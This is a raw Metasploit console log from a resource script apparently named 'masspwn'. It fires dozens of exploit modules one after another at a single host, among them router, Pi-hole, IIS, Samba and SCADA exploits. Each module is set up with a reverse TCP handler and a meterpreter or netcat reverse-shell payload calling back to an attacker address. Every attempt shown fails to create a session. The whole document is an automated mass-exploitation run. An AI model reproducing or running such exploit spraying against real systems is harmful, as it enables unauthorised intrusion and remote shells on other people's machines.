[-] 10.0.1.6:80 - Well that failed, trying the authenticated one...
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 63.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/http/dlink_hnap_login_bof
[*] Started reverse TCP handler on 10.0.1.4:2071
[*] No payload configured, defaulting to linux/mipsbe/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2072
LPORT => 2072
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] Exploit aborted due to failure: unknown: 10.0.1.6:80 - Failed to authenticate to the web interface.
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[-] Exploit failed: linux/mipsbe/meterpreter/reverse_tcp: All encoders failed to encode.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/example_webapp
[-] No results from search
[-] Failed to load module: exploits/example_webapp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2073
LPORT => 2073
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[-] Exploit failed: linux/mipsbe/meterpreter/reverse_tcp: All encoders failed to encode.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/unix/http/contentkeeperweb_mimencode
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2074
LPORT => 2074
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[-] 10.0.1.6:80 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/unix/http/epmp1000_ping_cmd_shell
[*] Using configured payload cmd/unix/reverse_netcat
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2075
LPORT => 2075
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 64.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/unix/http/epmp1000_get_chart_cmd_shell
[*] Using configured payload cmd/unix/reverse_netcat
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2076
LPORT => 2076
[*] Started reverse TCP handler on 10.0.1.4:2075
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[-] 10.0.1.6:80 - Application does not appear to be Cambium ePMP 1000. The target is not vulnerable.
[-] Exploit failed: NoMethodError undefined method `<' for nil:NilClass
[*] Exploit running as background job 65.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/unix/http/pihole_blocklist_exec
[*] Started reverse TCP handler on 10.0.1.4:2076
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2077
LPORT => 2077
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] 10.0.1.6:80 - Application does not appear to be Cambium ePMP 1000. The target is not vulnerable.
[-] Exploit failed: NoMethodError undefined method `<' for nil:NilClass
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 66.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/unix/http/pihole_whitelist_exec
[*] Started reverse TCP handler on 10.0.1.4:2077
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
[-] Exploit aborted due to failure: unexpected-reply: 10.0.1.6:80 - Check URI Path, unexpected HTTP response code: 404
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2078
LPORT => 2078
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 67.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/unix/http/xdebug_unauth_exec
[*] Using configured payload php/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
[*] Started reverse TCP handler on 10.0.1.4:2078
resource (masspwn.2974202.msf)> set LPORT 2079
LPORT => 2079
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] Exploit aborted due to failure: unexpected-reply: 10.0.1.6:80 - Check URI Path, unexpected HTTP response code: 404
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 68.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/unix/http/pihole_dhcp_mac_exec
[*] Using configured payload cmd/unix/reverse_netcat
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2080
LPORT => 2080
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[*] Started reverse TCP handler on 10.0.1.4:2079
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 69.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/misc/gh0st
[*] Started reverse TCP handler on 10.0.1.4:2080
[-] Exploit aborted due to failure: unexpected-reply: 10.0.1.6:80 - Check URI Path, unexpected HTTP response code: 404
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2081
LPORT => 2081
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 70.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/scada/advantech_webaccess_dashboard_file_upload
[*] Started reverse TCP handler on 10.0.1.4:2081
[*] 10.0.1.6:80 - Trying target Gh0st Beta 3.6
[*] 10.0.1.6:80 - Spraying heap...
[*] 10.0.1.6:80 - Bad magic: <html
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2082
LPORT => 2082
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 71.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/scada/ge_proficy_cimplicity_gefebt
[*] Started reverse TCP handler on 10.0.1.4:2082
[*] 10.0.1.6:80 - Target is not vulnerable.
[-] Exploit aborted due to failure: unknown: 10.0.1.6:80 - Failed to exploit router.
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2083
LPORT => 2083
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 72.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/proxy/bluecoat_winproxy_host
[*] Started reverse TCP handler on 10.0.1.4:2083
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2084
[*] BCLs available at \\10.0.1.4\wuP\Mwb{i}.bcl
LPORT => 2084
[-] Exploit failed: Errno::EACCES Permission denied - bind(2) for 0.0.0.0:80
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 73.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/proxy/qbik_wingate_wwwproxy
[*] Started reverse TCP handler on 10.0.1.4:2084
[*] 10.0.1.6:80 - Trying target WinProxy <= 6.1 R1a Universal...
[-] Exploit aborted due to failure: unknown: 10.0.1.6:80 - Failed to exploit router.
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2085
LPORT => 2085
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 74.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/http/bea_weblogic_jsessionid
[*] Started reverse TCP handler on 10.0.1.4:2085
[*] 10.0.1.6:80 - Trying target WinGate 6.1.1.1077...
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2086
LPORT => 2086
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 75.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/http/shttpd_post
[*] Started reverse TCP handler on 10.0.1.4:2086
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2087
LPORT => 2087
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 76.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/http/kentico_staging_syncserver
[*] Started reverse TCP handler on 10.0.1.4:2087
[*] 10.0.1.6:80 - Trying target address 0x776a183a...
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2088
LPORT => 2088
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 77.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/http/hp_nnm_openview5
[*] Started reverse TCP handler on 10.0.1.4:2088
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
[-] Exploit aborted due to failure: unexpected-reply: The payload was rejected
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2089
LPORT => 2089
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 78.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/http/sambar6_search_results
[*] Started reverse TCP handler on 10.0.1.4:2089
[*] 10.0.1.6:80 - Trying target HP OpenView Network Node Manager 7.50 / Windows 2000 All...
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2090
LPORT => 2090
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 79.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/http/sysax_create_folder
[*] Started reverse TCP handler on 10.0.1.4:2090
[*] 10.0.1.6:80 - Sending 14414 bytes to remote host.
[*] 10.0.1.6:80 - Got Response!
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2091
LPORT => 2091
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[-] Exploit failed: One or more options failed to validate: SysaxUSER, SysaxPASS.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/http/disk_pulse_enterprise_get
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2092
LPORT => 2092
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 80.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/http/disk_pulse_enterprise_bof
[*] Started reverse TCP handler on 10.0.1.4:2092
[*] Generating exploit...
[*] Sending exploit...
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2093
LPORT => 2093
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 81.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/http/cayin_xpost_sql_rce
[*] Using configured payload java/jsp_shell_reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2094
[*] Started reverse TCP handler on 10.0.1.4:2093
LPORT => 2094
[*] Generating exploit...
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[*] Total exploit size: 21383
[*] Triggering the exploit now...
[*] Please be patient, the egghunter may take a while...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 82.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/http/apache_modjk_overflow
[*] Started reverse TCP handler on 10.0.1.4:2094
[-] Exploit aborted due to failure: unexpected-reply: 10.0.1.6:80 - Invalid response to injection
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2095
LPORT => 2095
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 83.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/http/servu_session_cookie
[*] Started reverse TCP handler on 10.0.1.4:2095
[*] 10.0.1.6:80 - Trying target mod_jk 1.2.20 (Apache 1.3.x/2.0.x/2.2.x) (any win32 OS/language)...
[-] 10.0.1.6:80 - The exploit failed : HTTP Status Code '403 Forbidden' received :-(
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2096
LPORT => 2096
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 84.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/http/dup_scout_enterprise_login_bof
[*] Started reverse TCP handler on 10.0.1.4:2096
[*] 10.0.1.6:80 - Trying target Windows 2000 SP4 and XP SP3 English (SEH)...
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2097
LPORT => 2097
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 85.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/http/navicopa_get_overflow
[*] Started reverse TCP handler on 10.0.1.4:2097
[*] Generating exploit...
[*] Triggering the exploit now...
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2098
LPORT => 2098
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 86.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/http/amlibweb_webquerydll_app
[*] Started reverse TCP handler on 10.0.1.4:2098
[*] 10.0.1.6:80 - Trying target NaviCOPA 2.0.1 Universal
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2099
LPORT => 2099
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 87.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/http/xitami_if_mod_since
[*] Started reverse TCP handler on 10.0.1.4:2099
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2100
LPORT => 2100
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 88.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/iis/ms02_018_htr
[*] Started reverse TCP handler on 10.0.1.4:2100
[*] 10.0.1.6:80 - Waiting for payload to execute...
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2101
LPORT => 2101
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 89.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/iis/ms01_033_idq
[*] Started reverse TCP handler on 10.0.1.4:2101
[*] 10.0.1.6:80 - Trying target Windows NT 4.0 SP3 with jmp eax at 0x77f81a4d...
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2102
LPORT => 2102
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 90.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/iis/ms01_023_printer
[*] Started reverse TCP handler on 10.0.1.4:2102
[*] 10.0.1.6:80 - Trying target Windows 2000 Pro English SP0...
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2103
LPORT => 2103
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 91.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/iis/ms01_026_dbldecode
[*] Started reverse TCP handler on 10.0.1.4:2103
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2104
LPORT => 2104
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 92.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/netware/sunrpc/pkernel_callit
[*] Started reverse TCP handler on 10.0.1.4:2104
[*] 10.0.1.6:80 - Executing command: dir (options: {:windir=>"winnt"})
[*] No payload configured, defaulting to netware/shell/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2105
[*] 10.0.1.6:80 - Executing command: dir (options: {:windir=>"windows"})
LPORT => 2105
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] 10.0.1.6:80 - Exploit aborted due to failure: no-target: Unable to detect the target host windows directory (maybe not vulnerable)!
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 93.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/multi/ids/snort_dce_rpc
[*] Started reverse TCP handler on 10.0.1.4:2105
[*] Trying target Automatic...
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2106
LPORT => 2106
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 94.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/multi/samba/usermap_script
[*] Started reverse TCP handler on 10.0.1.4:2106
[-] 10.0.1.6:139 - Exploit failed: RuntimeError eno1: You don't have permission to capture on that device (socket: Operation not permitted)
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2107
LPORT => 2107
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 95.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/multi/samba/nttrans
[*] Started reverse TCP handler on 10.0.1.4:2107
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2108
LPORT => 2108
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
